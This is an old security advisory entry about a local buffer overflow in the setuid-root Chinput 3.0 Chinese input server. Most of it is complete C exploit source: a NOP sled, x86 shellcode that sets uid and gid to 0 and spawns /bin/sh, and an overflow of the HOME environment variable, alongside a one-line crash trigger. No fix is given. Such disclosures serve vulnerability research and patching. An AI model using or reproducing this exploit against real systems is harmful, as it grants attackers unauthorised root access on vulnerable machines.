|
COMMAND Chinput local buffer overflow leads gives root SYSTEMS AFFECTED ?? PROBLEM Xperc posted : Chinput is a Chinese input server on UNIX/Linux. It supports XIM(X Input Method) Protocl and its own protocl for Chinese platform. $ls -l /usr/bin/chinput -rwsr-xr-x 1 root root 317272 Jan 15 21:31 /usr/bin/chinput $export HOME=`perl -e \'print \"a\"x800\'` $/usr/bin/chinput Segmentation fault /* local exploit for Chinput 3.0 * .. tested in TurboLinux 6.5 with kernel 2.2.18 * * Usage: $gcc chinput_exp.c * $./a.out * bash-2.04$ /usr/bin/chinput * * by xperc@hotmail.com * 2002/1/16 */ #include <stdio.h> #include <stdlib.h> #define NOP 0x90 #define OFS 0x1f0 unsigned long get_esp() { __asm__(\"mov %esp,%eax\"); } char *shellcode= \"\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80\" /* setuid=0 */ \"\\x31\\xc0\\x31\\xdb\\xb0\\x2e\\xcd\\x80\" /* setgid=0 */ \"\\xeb\\x24\\x5e\\x8d\\x1e\\x89\\x5e\\x0b\" \"\\x33\\xd2\\x89\\x56\\x07\\x89\\x56\\x0f\" \"\\xb8\\x1b\\x56\\x34\\x12\\x35\\x10\\x56\" \"\\x34\\x12\\x8d\\x4e\\x0b\\x8b\\xd1\\xcd\" \"\\x80\\x33\\xc0\\x40\\xcd\\x80\\xe8\\xd7\" \"\\xff\\xff\\xff/bin/sh\"; char s[512]; char *s1; int main() { strcpy(s,\"HOME=\"); s1=s+5; while(s1<s+260+5-strlen(shellcode)) *(s1++)=NOP; while(*shellcode) *(s1++)=*(shellcode++); *((unsigned long *)s1)=get_esp()-OFS; printf(\"Jump to: %p\\n\",*((long *)s1)); s1+=4; *s1=0; putenv(s); system(\"bash\"); } SOLUTION ??